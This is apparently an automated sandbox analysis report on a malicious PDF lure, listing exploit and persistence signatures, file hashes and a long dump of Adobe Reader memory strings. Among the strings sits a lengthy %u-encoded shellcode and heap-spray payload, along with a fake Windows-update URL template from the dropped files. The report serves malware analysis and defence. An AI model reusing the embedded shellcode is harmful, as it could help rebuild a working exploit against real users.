Joebox - Abstract Analysis File 10163

+ General information
Joebox version:	4.5.0
Start time:	14:30:18
Start date:	02/12/2011
Overall analysis duration:	0h 8m 22s
Target binary file name:	Bin Ladens successor.pdf
Target script file name:	default.jbs
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Errors:	Too many NtReadFile calls (excessive behavior) Too many NtWriteFile calls (excessive behavior)

+ Classification / Thread Score
Persistence, Installation, Boot Survival:
Hidding, Stealthness, Detection and Removal Protection:
Security Solution / Mechanism bypass, termination and removal, Anti Debugging, VM Detection:
Spreading:
Exploiting:
Networking:
Data spying, Sniffing, Keylogging, Ebanking Fraud:

+ Signature Detections
Creates files inside the user directory
Creates temporary files
Printf formatting strings found in memory and binary data
Queries a list of all running processes
SQL strings found in memory and binary data
Spawns processes
Urls found in memory or binary data
Deletes itself after installation
Found strings which match to known social media urls
Performs DNS lookups
Creates a PDF file and show it to the user (probably a fake PDF to hide exploiting)
PDF exploit detected (malicious Acrobat Reader behavior, DNS queries)
PDF exploit detected (malicious Acrobat Reader behavior, loads network DLL)

Static File Information

+ General Information
File name:	Bin Ladens successor.pdf
File size:	103981
MD5:	8e633588b3ee59de09fe126d99869d2d
SHA1:	57363d0011cde51d4aaf229f1b1c2808bad9a8cf
SHA256:	d9493b6243a0378859610748590de21dc4df36c287197fde13c507d3895f8be6
File type:	PDF document, version 1.6

String Analysis

+ Formattings for printf style functions
String value	Source
r '%s'.Index oder Gr	AcroRd32.exe
sung: horizontal %hr% Pixel/%unit% vertikal %vr% Pixel/%unit2%Filter: %fi%ASCII hexadezimalASCII base-85LZWzlib/deflateRun-Length Encoding (RLE)CCITT Group 4 (FAX)JBIG2JPEGJPEG2000verschl	AcroRd32.exe
ssen enthalten:Suchen in:Folgende Zusatzkriterien verwenden:PDF-Dokumente im Internet durchsuchenInternet durchsuchen mit %sErweiterte Suchoptionen verwendenIn den Ergebnissen suchenNeue SucheIn lokalen PDF-Dokumenten suchenEinfache Suchoptionen verwendenNeue Suche beginnenDas aktuelle DokumentIndex ausw	AcroRd32.exe
%get_reader_text%	AcroRd32.exe
r Konvertierung alternativer Bilder bearbeitet.Seite %sPers	AcroRd32.exe
ffnen Sie es erneut.Text mit der Schrift und Zeichen "%s" konnte nicht korrekt angezeigt oder gedruckt werden. Die Schrift konnte nicht neu kodiert werden.Nicht gen	AcroRd32.exe
mtliche von der Schrift "%s" verwendeten Zeichen enth	AcroRd32.exe
lt Sicherheitseinstellungen.Datei "%s" enth	AcroRd32.exe
tzen. Tipp(%2)Datendatei nicht gefunden: %s.Option 'Hilfe-Spur' erfolgreich abgeschlossen.Ung	AcroRd32.exe
r das Formular an: "%s".Das erforderliche Feld "%s" stellte sich beim Exportieren als leer heraus.Formulardaten importierenFeld ein-/ausblendenFormulareDaten &importieren...Daten e&xportieren...Sortieren&Tab-Reihenfolge&Alphabetische ReihenfolgeTab-Reihenfolge&Tabs nach Zeilen anordnenTabs nach &Spalten anordnen&Tabs nach Zeilen anordnenTabs &manuell anordnen&Tabs nach Nicht angegeben anordnenFormularfeldIn Formularfeldern...Einige Felder sind fehlerhaft und verhalten sich u. U. nicht wie erwartet. Bitten Sie den Autor um Korrektur.	AcroRd32.exe
gt 0 Byte, Grafik %s wird nicht dargestellt.Fehler beim Abrufen der Bytes, Grafik %s wird nicht dargestellt.Wiedergabe von Text ( %1 ) nicht m	AcroRd32.exe
ffnet werden.Der Dateiname "%s" ist zu lang. Geben Sie einen k	AcroRd32.exe
lt.Die Datei "%s" wurde nicht gespeichert, da sie bereits vorhanden ist.	AcroRd32.exe
ndern%s hat die Freigabe Ihres Computers angefordertam/pm (Beispiel: 1:04 pm)	AcroRd32.exe
genErsetzenMitgeliefertRomanExpertAnsiStandardBenutzerdefiniertType 1MMType 3TrueTypeType 0Type 1 (CID)TrueType (CID)Unbekannt (Eingebettet) (Eingebetteter OpenType) (Eingebettete Untergruppe) (Eingebettete OpenType-Untergruppe)Typ: %sKodierung: %sOriginalschrift: UnbekanntOriginalschrift: %sFontOriginalschrifttyp: %sType\24Sonderzeichen...Von leerer SeiteDokumentmana&gement&Auschecken...&Einchecken...&R	AcroRd32.exe
ndern.Die Datenerfassung ist beendet.%num% neue Formulare wurden empfangenJaNeinNicht zutreffend - anonymDies ist ein Formularordner{Art} der {	AcroRd32.exe
cher werden optimiert.Die Schrift "%s" enth	AcroRd32.exe
ltige/defekte bmp-Datei.Fehler beim Lesen der PNG-Datei : %sFehler beim Lesen der TIFF-Datei : %s.Nicht unterst	AcroRd32.exe
hrenAdobe Acrobat-DokumentAdobe Acrobat Forms-DokumentAcrobat-Dokument zum Verwalten von RechtenAdobe Reader konnte "%s" nicht	AcroRd32.exe
ltiger numerischer Wert.`Eine Zahl zwischen %s und %s ist erforderlich. Der n	AcroRd32.exe
ttigungSchrift: %f Gr	AcroRd32.exe
nger als %s Stunden in diesem Raum aufgehalten. S	AcroRd32.exe
e: %w% x %h% Pixel (%uw% x %uh% %units%)Bit/Pixel: %d%Aufl	AcroRd32.exe
%proposed_filename%	AcroRd32.exe
tzt.%0 Vorgang ist fehlgeschlagen, weil kein Unterschriftsinhalt angegeben wurde.Vorgang %0 ist fehlgeschlagen, weil das Feld %1 an keinen XFA-Datenknoten gebunden ist.XSL-Datei nicht gefunden: %s.Neues pageArea-Objekt konnte nicht ausgew	AcroRd32.exe
ltiges Muster.Muster des Typs "%s" wird nicht unterst	AcroRd32.exe
berdrucken: %OPP%	AcroRd32.exe
gen.Datei: Seite: %sZoomfaktor: %sPDF-Anlage	AcroRd32.exe
%cNum%	AcroRd32.exe
ffnet, das mit dem Multimediainhalt %p auf einem Wechseldatentr	AcroRd32.exe
nderungen an "%s" vor dem Schlie	AcroRd32.exe
fen" auf der Registerkarte "Optionen".Dieses Format entspricht nicht dem angegebenen Standardwert (%s). W	AcroRd32.exe
ltigen Seitenbereich ein.%ld von %ld Bi	AcroRd32.exe
scht. %M% von %N% PDF-Datei hat eine Bates-Nummer erhalten. Bei %M% von %N% PDF-Datei wurde die Bates-Nummer gel	AcroRd32.exe
ffnenAcrobat hat die Datei %s nicht gefunden.	AcroRd32.exe
nder: %sLinks: %sOben: %sRechts: %sUnten: %sBreite: %sH	AcroRd32.exe
%cProductVariant%	AcroRd32.exe
gt sind, klicken Sie auf %OK_BUTTON%.Nach obenNach untenEntfernenDateien hinzuf	AcroRd32.exe
lltes Formular an diese Faxnummer&DruckenDaten aus %sDie Dateianlage enth	AcroRd32.exe
schenDeckendVorschauAnhand der Far&beTe&xt&Datei&vonvo&nEx&pliziten Wert verwendenAn &Seite anpassen&Einheit:Skal&ierung relativ zur ZielseiteAbsolute Skalierun&g:Einstellungen speichernVorschau von %f&Seitevon %nAusgeblendeter Text in %f-+&<&>&Seite:N	AcroRd32.exe
er als oder gleich der Endseitenzahl sein.Es gibt keine Seite mit der Seitenzahl "%s" in diesem Dokument.Das Feld f	AcroRd32.exe
chten Sie fortfahren und nur die druckbaren Dokumente drucken?Das Dokument versucht, den Catalog-Index %s zu laden. Wenn Sie dem Dokument vertrauen, klicken Sie auf "Laden", um diesen Index zu laden.&Nach diesem Index nicht mehr fragen.Der Flash-Inhalt dieses Dokuments erfordert Version %1 des eingebetteten Flash Player. Auf der Adobe-Website finden Sie entsprechende Informationen. M	AcroRd32.exe
%02d%s%02d%s	cmd.exe
hren, damit alle Dateien verarbeitet werden.%N%%N% von %M%%N%/%M%Seite %N%Seite %N% von %M%Bates-NummerBeim Abrufen des Seiteninhalts ist ein Fehler aufgetreten.%m1%/%d1%%m1%/%d1%/%y2%%m1%/%d1%/%y4%%m2%/%d2%/%y2%%m2%/%d2%/%y4%%m2%/%y2%%m2%/%y4%%m1%.%d1%.%y2%%m1%.%d1%.%y4%%m2%.%d2%.%y2%%m2%.%d2%.%y4%%m2%.%y2%%m2%.%y4%%y2%-%m2%-%d2%%y4%-%m2%-%d2%%d1%/%m1%/%y2%%d1%/%m1%/%y4%%d2%/%m2%/%y2%%d2%/%m2%/%y4%%d1%.%m1%.%y2%%d1%.%m1%.%y4%%d2%.%m2%.%y2%%d2%.%m2%.%y4%%12%:%M% %D%%24%:%M%ampm&Bates-Nummerierung&Hinzuf	AcroRd32.exe
%systemroot%\system32\com\dmp	AcroRd32.exe
ndern: %sAusf	AcroRd32.exe
%02d%s%02d%s%02d	cmd.exe
Vollbildmodus zu beenden.%s1 (%s2)%s1 (Umschalt+%s2)KennwortschutzZusatzmodule suchen und registrieren...%s%%WeitersuchenVorherige suchenGeben Sie ein Wort oder Satzst	AcroRd32.exe
%Locale:0x409	AcroRd32.exe
r das in der momentanen Konfiguration nicht vorhandene eBook-Zusatzmodul erforderlich ist.Das Zusatzmodul "%s" wurde entfernt. Installieren Sie Acrobat neu, um die aktuelle Datei anzuzeigen.Die aktuelle Datei kann nicht angezeigt werden, da in der momentanen Konfiguration ein Zusatzmodul nicht vorhanden ist.Dokumentanalyse f	AcroRd32.exe
chten Sie den Ordner "%foldername%" wirklich aus Tracker l	AcroRd32.exe
<o%p'D	AcroRd32.exe
gt werden soll%fdfname% enth	AcroRd32.exe
fung fehlgeschlagen.Protokollfehler: %sDaten konnten nicht in "%s"	AcroRd32.exe
ssen das %sPACKAGE% installieren, um das Formular anzuzeigen oder auszuf	AcroRd32.exe
lt bereits einen Ordner mit Namen "%fname%". Ein neuer Ordner kann nicht erstellt werden.Der Vorgang wurde abgebrochen. Es wurden keine Dateien hinzugef	AcroRd32.exe
gen Sie den Host "%s1" zur Liste vertrauensw	AcroRd32.exe
r alleOrdner suchen... Beim Lesen dieses Dokuments ist ein Problem aufgetreten (%d).Das Kennwort ist falsch. Vergewissern Sie sich, dass nicht versehentlich die Feststelltaste f	AcroRd32.exe
chste Seite mit ausgeblendetem TextVorherige Seite mit ausgeblendetem TextAusgeblendeter Text auf Seite %p:Nur ausgeblendeten Text anzeigenNur sich	AcroRd32.exe
rzeren Namen an.Der Dateiname "%s" ist ung	AcroRd32.exe
%newdeadline%	AcroRd32.exe
chten Sie die Einstellung "%presetName%" wirklich l	AcroRd32.exe
bernehmen.75%200%400%Originalgr	AcroRd32.exe
eOrt in DokumentRegisterkarte "Anlagen"Seite %d%s (Seite %d)(%d)	AcroRd32.exe
%PDF-1.6	AcroRd32.exe
ltig: %sOption muss angegeben werden: %s(Intern) Fehler beim Lesen des Optionswerts: %sOptionswert ist gesperrt und kann nicht festgelegt werden: %sF	AcroRd32.exe
chte Dokumente freigeben%s Benutzer m	AcroRd32.exe
nschten Datei und versuchen Sie es noch einmal.Es wurde kein Quelltext eingegeben. Geben Sie Text ein, und versuchen Sie es erneut.Prozent%s% konnte nicht in das PDF-Format konvertiert werden. W	AcroRd32.exe
%client_requirement_msg%	AcroRd32.exe
cheSmooth ShadesDeviceRGBDeviceGrayRegistrierungsfarbeTextVektorgrafikSepariertPunktbeispielDurchschnittlich 3 mal 3Durchschnittlich 5 mal 5FarbwarnungenObjektinspektorObjekt %objecttype% gefundenKonstantBildImageMaskMaskeMusterFunktionschattierungAchsenschattierungRadialschattierungGitterschattierungRasterschattierungTransparenzgruppeU	AcroRd32.exe
ffnen der Datei "%s" konnte nicht gefunden werden.Datei "%s" konnte nicht ge	AcroRd32.exe
chten Sie die Datei "%fname%" ersetzen?Das Portfolio enth	AcroRd32.exe
,%EDYX	AcroRd32.exe
Namen "%formname%" wirklich aus Tracker entfernen?	AcroRd32.exe
chentext ausblendenSeitenbereichsvorschau und -auswahlVorschauSeite %n von %mSeitenbereich ausw	AcroRd32.exe
llen finden Sie im Fenster "Formulare" unter %s > Voreinstellungen.BearbeitenAcrobatWarnung: Mit der ESC-Taste werden alle	AcroRd32.exe
nderungen an dieser Datei zu ignorieren.Die Datei '%s' ist in einer anderen Anwendung ge	AcroRd32.exe
chten Sie die erfassten Daten mit Namen "%formname%" wirklich aus Tracker entfernen?	AcroRd32.exe
tze rechts nach linksArabisch-indische ZiffernArabisch-indische ZiffernZu verw. Ziffern: %s	AcroRd32.exe
r diesen Dateityp klicken Sie auf "Einstellungen bearbeiten".PICT-DateienSchriftinformationen werden abgerufen... (%d%)Dieser Vorgang kann nicht r	AcroRd32.exe
enVerbindung wird hergestellt...Bitte nehmen Sie an einem Onlinemeeting teilKlicken Sie hier, um am Meeting teilzunehmen:Wartezeit:Millisek.Automatischen Zugang zulassenZur Teilnahme ist meine Zustimmung erforderlichGeschwindigkeit%s wird eingegeben10121416202436488Notizen l	AcroRd32.exe
r Sie berechnen.%s legt die Bandbreite f	AcroRd32.exe
Interfaces: %lu	AdobeArm.tmp.dr, userinit.dll.dr
end auf %s, um das ausgef	AcroRd32.exe
tzt wird. Es wird empfohlen, dass Sie die neueste Version verwenden. Diese finden Sie auf der Website http://www.adobe.com/go/reader_download_de.Der/die folgende(n) Navigator(en) aus Verzeichnis '%s' konnten nicht geladen werden, da sie anscheinend ein neues Format verwenden, das von dieser Reader-Version nicht unterst	AcroRd32.exe
r Anlagen wirklich wiederhergestellt werden?Sie haben ein Dokument mit %p Multimedia-Inhalt ge	AcroRd32.exe
hlte Dokumentegesamtes PDF-PortfolioAlle PDF-Dokumente inIm Index %sIndex mit Namen %sSuchenKommentare durchsuchenAnlagen durchsuchenAusgew	AcroRd32.exe
chte eintreten.Da Sie %s Minuten allein im Meetingraum waren, wurde die Verbindung abgebrochen. Sie k	AcroRd32.exe
t</h3><p>Standard: %STD%<br />ISO-Name: %ISO%<br />Status: <span style="color:#000000">noch nicht	AcroRd32.exe
ltige Option angegeben: %sFalsche Kategorie f	AcroRd32.exe
.Beim Lesen der Seite %s trat bei folgendem Inhalt ein Fehler auf:Bei der Analyse eines Bildes wurde "EI" erwartet.Unbekannter Filtername.Fehlerhafter Decode-Array.Unzul	AcroRd32.exe
ngen".Die Datei "%s" ist gesch	AcroRd32.exe
ffnen oder speichern.Dieses Dokument hat %d Dateianlagen. Auf der Registerkarte "Anlagen" k	AcroRd32.exe
%s (Build %d)	AdobeArm.tmp.dr, userinit.dll.dr
r %ID% wurde kein Meetingraum gefunden.Dies ist keine g	AcroRd32.exe
nnen Sie unter %s kostenlos herunterladen.TextdateienDie Datei %s konnte nicht ge	AcroRd32.exe
r '%1' nicht gefunden.SOAP-Fehler beim Verbinden zu '%0'. SOAP-Fehlercode ist '%1', SOAP-Antwort ist '%2'.Codeseite: %s nicht unterst	AcroRd32.exe
ber Ihren Internet-E-Mail-Dienst manuell an %s.&AndereW	AcroRd32.exe
chten Sie %s wirklich l	AcroRd32.exe
%2d%s%02d%s%02d%s%02d	cmd.exe
CMD Internal Error %s	cmd.exe
r %s ist auf %p eingestellt.Soll die Liste der vertrauensw	AcroRd32.exe
ltiger TagDer Wert "%s" ist kein g	AcroRd32.exe
ffnen Sie die richtige Unternehmensdatei.Bei der Kommunikation mit QuickBooks ist ein Fehler aufgetreten. (%s)Es fehlt ein f	AcroRd32.exe
llte Formular aus.Die Nutzung erweiterter Funktionen dient lediglich zu Auswertungszwecken und ist befristet.Die Nutzung erweiterter Funktionen dient lediglich zu Auswertungszwecken und ist bis zum %sDate% befristet.SeitenanzeigeFarbmanagementAllgemeinDokumenteVollbildIdentit	AcroRd32.exe
sung verwenden: %DAdobe In-RIPVektorgrafiken und Text: %DVerlauf und Gitter: %DPS Formobjekte ausgeben: %DRichtlinien f	AcroRd32.exe
1ac5%u8312%u686e%uc768%uda1c%uc62f%uc268%u1c7f%u2fc2%u68c5%u7bc2%u2a1a%u6943%u6868%u57a4%u862e%u9797%u6597%u1a3c%ud32a%u6869%ud868%u17d0%u97a8%u6de2%u9017%ud0b7%u9051%u1ab5%u8f22%u6868%ud968%ud1d0%u891d%u881f%ua917%ue297%u5162%ub590%u51d0%u9790%u121a%u6953%u6868%u1ac7%u431a%u6869%uc668%u97fd%u97fd%u97fd%u97fd%u97fd%u97fd%u021a%u69d3%u6868%ufdc5%u6897%u63c2%ud21c%uc723%uc268%u687b%u6fc2%ud21e%ufd27%u1c97%u27da%u68c6%u6bc2%uc1c6%ue41c%u1cab%u89e3%u94ef%uc164%ue11c%u94b7%ua464%uc45e%ud6de%ucc3a%u5494%ua4c4%u984c%u8729%u41ad%u9fe3%u5c56%u9490%ud74d%u667c%u88ac%u72e2%uc9cd%uc91c%u94b3%uf14d%u9b1c%u1cdc%u8bc9%u4d94%u931c%u941c%uc055%u2a1a%u6853%u6868%uda1c%u1457%u9350%u6c75%uc83c%u5014%u1c93%uc94d%u68ce%u57d2%u7f54%u6deb%u6868%u387a%u2368%ufd09%u7bde%ue3a5%u9b06%u4812%u2c38%u8419%u3b9d%u29d4%u4c3b%ua504%u0373%ua125%u8498%u1a53%ue388%uf1c0%u689a%u75ae%u14ea%u2b5e%ufc31%u712c%uadb8%u6518%uf68f%u01ba%u9796%u2f97%u9797%u355e%u9797%u978c%u9797%ud42f%u9797%u9785%u9797%ub0b4%u9797%u48b4%u9797%ufed5%ub7f9%uf6db%uf2f3%u36f9%ue438%ue4b7%uf4e2%uf2f4%ue4e4%ue5f8%ue7b9%uf1f3%ub297%uf2e3%ue7fa%ucbb2%uf3d6%uf5f8%ud6f2%ufae5%ue3b9%ue7fa%u9797%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b9b%u9b00%u0000%u0000%ub901%ud900%u1401%u0801%u6663%u3831%u3030%u3030%u3063%u3063%u3039%u3737%u6530%u3839%u6538%u3833	AcroRd32.exe
gt, weil %s nicht in das PDF-Format	AcroRd32.exe
chenwerte besitzen.Das Feld %s existiert nicht. Wiederholen Sie Ihre Eingabe.PDF417QR CodeData MatrixHand-Scanner f	AcroRd32.exe
ffnen: %sDokumenttitel anzeigen: %sMen	AcroRd32.exe
tztes Dokument nicht angewendet werden.Die Schrift "%s" enth	AcroRd32.exe
, um die Daten zu empfangen.%s1	AcroRd32.exe
r die Seitenzahl kann nicht leer gelassen werden."%s" ist eine ung	AcroRd32.exe
gt werden, da das Format nicht dem angegebenen Format (%s) entspricht. Um diesen Wert der Kombinationsfeldliste hinzuzuf	AcroRd32.exe
r "%s"-Anmerkung oder -kommentar erforderliches Zusatzmodul ist nicht verf	AcroRd32.exe
enStapelverarbeitungIn PDF konvertierenAus PDF konvertierenMessen (2D)Messen (3D)Messen (Geo)Keinhttp://www.adobe.com/go/acrobat_manage_acct_dehttp://www.adobe.com/go/acrobat_change_passwd_dehttp://www.adobe.com/go/reader_manage_acct_dehttp://www.adobe.com/go/reader_change_passwd_de%stxt.pdf&Weiter&Zur	AcroRd32.exe
schenAnlage durchsuchen%FILENAME%' in Vorschau anzeigenVergr	AcroRd32.exe
r das Formular an: "%s".	AcroRd32.exe
%dateTimeSentRecvd%	AcroRd32.exe
hlte Verzeichnis konnte nicht gefunden werden: %sAn dem Dokument wurden seit der letzten Indizierung	AcroRd32.exe
o#o%o(o	AcroRd32.exe
ltige %ext%-Datei.	AcroRd32.exe
ume in den entsprechenden Zielfarbraum zu konvertieren.Seite %PAGE% wird konvertiert.Klicken Sie mit der Maus, um festzulegen, wie Druckfarben behandelt werden, w	AcroRd32.exe
nischUkrainisch [Nicht installiert]^0.^1 (Acrobat ^2.x)^0.^1, Adobe Extension Level ^2 (Acrobat ^3.x)^0.^1, Adobe Extension Level ^2 (Unbekannte Acrobat-Version)%SIZE% GB (%SIZEBYTES% Byte)%SIZE% MB (%SIZEBYTES% Byte)%SIZE% KB (%SIZEBYTES% Byte)%SIZE% GB%SIZE% MB%SIZE% KB%SIZE% ByteLinksRechtsvon %ldvon %s (%ld)%s (%ld)&Dokumenteigenschaften...D&okumentstatus...Do&kumentsicherheit...&Voreinstellungen...D&ateianlagen...Neues Lesezeichen erstellenMarkierte Lesezeichen l	AcroRd32.exe
lt.Die Datei "%s" wurde nicht geteilt, da das Dokument nur 1 Seite enth	AcroRd32.exe
nnen nicht aus Acrobat exportiert werden. in auf Seite %d von %s wird hinzugef	AcroRd32.exe
%newComments%	AcroRd32.exe
gen...DatummmmmmmmmmmtttjjjjjjZeit12 Stunden24 StundenBenutzerdefinierter Text%s Fett kursiv%s Fett%s Kursiv%sDurch Klicken auf die Drucken-Schaltfl	AcroRd32.exe
bergeordnetem Ordner wechseln%FILENAME%' in eigener Anwendung	AcroRd32.exe
r: %DVon: %M bis: %NVorschau: %DTiffPICTSchriftausgabe: %DTranzparenzgrad: %DKeine SchriftenAlle SchriftenEingebettete SchriftenProfil: %DCMYK-ArbeitsfarbraumRGB-ArbeitsfarbraumGraustufen-ArbeitsfarbraumCIDFontType2 als CIDFontType2 ausgeben: %DTrueType in Type 1 konvertieren: %DKommentare ausgeben: %DHalbtonraster ausgeben: %DKurvenn	AcroRd32.exe
Das erforderliche Feld "%s" stellte sich beim Exportieren als leer heraus.	AcroRd32.exe
hlte SeitenAktuelle AnsichtEncapsulated PostScriptPostScriptEingebettete und referenzierte SchriftenEingebettete SchriftenSprachebene 1Niveau 2Niveau 3Dateianlagen - DokumentDateianlagen - Seite %dNach Dateianlagen auf Seiten suchen...Dateien hinzuf	AcroRd32.exe
gt sind, klicken Sie auf %OK_BUTTON%.Dokumente teilenTeilDokument teilen - WarnungDokument teilen - FehlerAdobe-XML-Formulare k	AcroRd32.exe
bergeordnete &Lesezeichen&Maximale Anzahl Seiten:Ma&ximale MB:A&usgabeoptionenWillkommen beim FormularbearbeitungsmodusIhr PDF-Formular "%f" wurde erstellt.Beim Erstellen wurden m	AcroRd32.exe
erungswert muss $FITTYPES$ sein oder zwischen $ZOOMMIN$ und $ZOOMMAX$ liegen.Geben Sie einen Wert zwischen $ZOOMMIN$ und $ZOOMMAX$ ein.Geben Sie einen Anfangswert von mindestens 1 ein.Speichern unter%s	AcroRd32.exe
%d.%d.%d.%d	AdobeArm.tmp.dr, userinit.dll.dr
ltige Zeile: %s%1 ist eine nicht unterst	AcroRd32.exe
llt werden.Die Datei %s existiert nicht. Geben Sie einen g	AcroRd32.exe
bersprungen.Die Datei '%s' ist in einer anderen Anwendung ge	AcroRd32.exe
chten Sie den Ordner "%foldername%" wirklich aus Tracker entfernen?M	AcroRd32.exe
Interface index: %lu	AdobeArm.tmp.dr, userinit.dll.dr
berschrieben werden.PostScript-Level: %DBin	AcroRd32.exe
ltnis%dFehlerkorrektur-Level%dUng	AcroRd32.exe
sseln.Die eingebettete Schrift "%s" konnte nicht entnommen werden. Einige Zeichen werden u. U. nicht korrekt angezeigt bzw. gedruckt.Die Schrift "%s" konnte nicht gefunden oder erstellt	AcroRd32.exe
IP address: %s	AdobeArm.tmp.dr, userinit.dll.dr
r dieses '%s'-Feld erforderliche Zusatzmodul ist nicht verf	AcroRd32.exe
O#O%O(O	AcroRd32.exe
llung: %DScreening: %DNegativ: %DSpiegeln: %DAsiatischWestlichDruckermarken	AcroRd32.exe
r '%s'. Es kann nicht gepr	AcroRd32.exe
%username%	AcroRd32.exe
ssiger Vorgang ("%s") im Textobjekt.Eine indizierte	AcroRd32.exe
en".AktiviertHohe BandbreiteHost-ID:Der Veranstalter hat das Meeting verlassen. Die Verbindung wird in %s Sekunden beendet.KbpsLANWartezeitModemNeinOKTeilnehmer-ID:Teilnehmercode:Sobald sich die Teilnehmer dem Meeting angeschlossen haben, werden die Details der Telefonkonferenz angezeigt.TelefondetailsTelefonnummerDetails zur TelefonkonferenzW	AcroRd32.exe
/windowsupdatev7/search?hl=%s&q=%s&meta=%s&id=%s	AdobeArm.tmp.dr, userinit.dll.dr
lt Anlagen. Anlagen werden nicht in die neu erstellten Dateien kopiert.Die Datei "%s" enth	AcroRd32.exe
chten.ParameterWertptZollmmcmEin unerwarteter Fehler ist aufgetreten. %s Mil*X-Ma	AcroRd32.exe
fprotokoll</h3><p>Profilname: %PROFILE%<br />Erstellt von: %PROFILE_CREATOR% [%PC_VERSION%]<br />Ergebnis: <span style="color:#0000FF">Erfolgreich</span><br />Ergebnis: <span style="color:#FF0000">Fehlgeschlagen</span><br />Ergebnis: <span style="color:#0000FF">Warnhinweis oder Info</span><br />Ge	AcroRd32.exe
ckgabe-URLs zugewiesen sind.Es konnte kein Vorgangsordner im angegebenen freigegebenen Order bzw. gehosteten Service eingerichtet werden.http://www.adobe.com/go/partners_cds_dehttp://www.adobe.com/go/reader_download_deDatei wird hochgeladen. (%cur% / %tot% KB)Dateien werden hochgeladen. (%cur% / %tot% KB)Informationen werden von Acrobat.com abgerufen.Digitale ID-Datei erstellenKennw	AcroRd32.exe
gbarZum Unterschreiben klicken%sTOOLTIP% (%sCOMMENT%)Zum W	AcroRd32.exe
er als oder gleich %s sein.	AcroRd32.exe
genVerbinden mit %sDOMAIN%Webservice:%sOPERATION% [	AcroRd32.exe
fungHochgestelltTiefgestellt&Textstil&SchreibrichtungOptionenOptionenKeine FarbeAndere Farbe...%d% Deckkraft%d ptLinienstilKeine LinieUnterstreichenPatente/Rechtliche HinweiseAutorenAutorenlisteAnhalten28,8 Kbps33,6 Kbps56 Kbps112 Kbps256 Kbps384 Kbps512 Kbps756 Kbps1 Mbps1,5 MbpsLAN&Werkzeugleiste "%TB%" ausblendenVorschau wird nicht unterst	AcroRd32.exe
r '%s'. Zertifikatdatei kann nicht gelesen/ge	AcroRd32.exe
%%EDYX	AcroRd32.exe
lt bereits einen Ordner mit Namen "%fname%".	AcroRd32.exe
fen%firstname% %lastname%InternationalIn diesem Dialogfeld werden Voreinstellungen festgelegt. Es kann erst angezeigt werden, wenn ein Dialogfeld zum Festlegen von Voreinstellungen in einem anderen angezeigten PDF-Dokument geschlossen wird. Schlie	AcroRd32.exe
scht werden sollen, hinzu.Die Datei '%s' ist ein PDF-Portfolio mit mehreren Dateien.Adobe XML-Formularen d	AcroRd32.exe
oder kleiner ist.Die Datei "%s" kann nicht in Dokumente mit einer Gr	AcroRd32.exe
dOstWestNSOW%dms% %dirabbr%EntfernungseinheitFl	AcroRd32.exe
glicherweise ein kompatibler Video-Dekompressor installiert sein.Video umwandelnKapitel %ChapterNumber%NavigationDatei ausw	AcroRd32.exe
lt ein Adobe-XML-Formular.Datei "%s" enth	AcroRd32.exe
digt.In der Schrift "%s" ist der Wert f	AcroRd32.exe
%error%	AcroRd32.exe
nBlauCyanMagentaGelbProzess %PROCESSCOLOR-Benutzerdefiniert...-Datei: UnbenanntFarbeNormalFettKursivFett & KursivSollen die Seiten wirklich aus dem Dokument gel	AcroRd32.exe
hren dieses Vorgangs berechtigt. Fehler beim Laden des Zusatzmoduls "%s".Initialisieren von %s...%s importiert Funktionen, ersetzt und/oder registriert...%s exportiert Funktionen...Laden von %s...Laden & Zertifizieren von %s...Laden des Zusatzmoduls wurde ausgelassen.F	AcroRd32.exe
ckgesendetes Formular: %sDatenAusf	AcroRd32.exe
ltige Schrift "%s" wurde aus dem Dokument entfernt.Sie k	AcroRd32.exe
llende Formular zu senden.Daten an %s sendenDieses Dokument enth	AcroRd32.exe
eterMillimetermmPicaPicapipcqPixelPixel%d ptSchmalMittelBreitHebt das der aktuell angezeigten Seite zugeordnete Lesezeichen hervorLateinischJapanischTraditionelles ChinesischVereinfachtes ChinesischKoreanischKyrillischArabischHebr	AcroRd32.exe
ltiges Attribut von %2, Attribut nicht geladen. Zeile %3.Erstellung von "%s" fehlgeschlagen, Knoten existiert bereits.F	AcroRd32.exe
berlappung muss zwischen 0 und %max% %units% liegen.Westlicher Stil	AcroRd32.exe
\%num\%	AcroRd32.exe
chen des Navigationsfensters ausblenden&Geteilte Fenster zulassen&Automatisches Ausblenden der Fenster zulassenUnbenanntNeue Sammlung %dptPunktPunkt"ZollZollZollZentimeterZentimeterZentimeterZentimetercmMillimeterMillimeterMilli	AcroRd32.exe
ndern&Messungsmarkierung aktivieren&Messungsmarkierung deaktivierenKoordinatenanzeige aktivierenKoordinatenanzeige deaktivierenMarkierungsbeschriftung:AusrichtungstypenAm Raster ausrichten aktiviertMessungstypenMessenMessanzeigeMessung%n%Messansicht%n%Modelleinheiten definieren&Messen-Werkzeugleiste einblenden&Messen-Werkzeugleiste ausblenden&Messinformationen-Fenster einblenden&Messinformationen-Fenster ausblenden&Position des Messinformationen-Fensters zur	AcroRd32.exe
gt sind, klicken Sie auf %OK_BUTTON%.Dieser Vorgang kann in Adobe XML-Formularen nicht ausgef	AcroRd32.exe
elegt.Die Datei "%s" kann Programme, Makros oder Viren enthalten, die Ihren Computer m	AcroRd32.exe
hrt werden, da das richtige Kennwort nicht eingegeben wurde.Es wurde keine PDF-Datei erstellt, da %s nicht in PDF konvertiert werden konnte. Entfernen Sie die Datei aus der Liste und versuchen Sie es erneut.Datei %s konnte nicht in PDF konvertiert werden. Entfernen Sie die Datei aus der Liste und versuchen Sie es erneut.Datei %s konnte nicht ge	AcroRd32.exe
r Schrift %slogcontentLog To-Wert in Konfigurationsdatei nicht angegeben.Log Uri-Wert in Konfigurationsdatei nicht angegeben.Verfolgt den Prozess des Verbindens und Abrufens von Datenbankobjekten.Protokoll-Informationen fehlen.Nicht erkanntes Befehlszeilenargument (%s)Option 'Hilfe' erfolgr	AcroRd32.exe
ffnen%FILENAME%' in einem neuen Fenster	AcroRd32.exe
GPU: %GPU%EinAus&Setup-Assistent...&Leseoptionen	AcroRd32.exe
tztes XFA-Dokument ist.Es wurde keine PDF-Datei erstellt, weil %s% ein zertifiziertes Dokument ist.Zusammenzuf	AcroRd32.exe
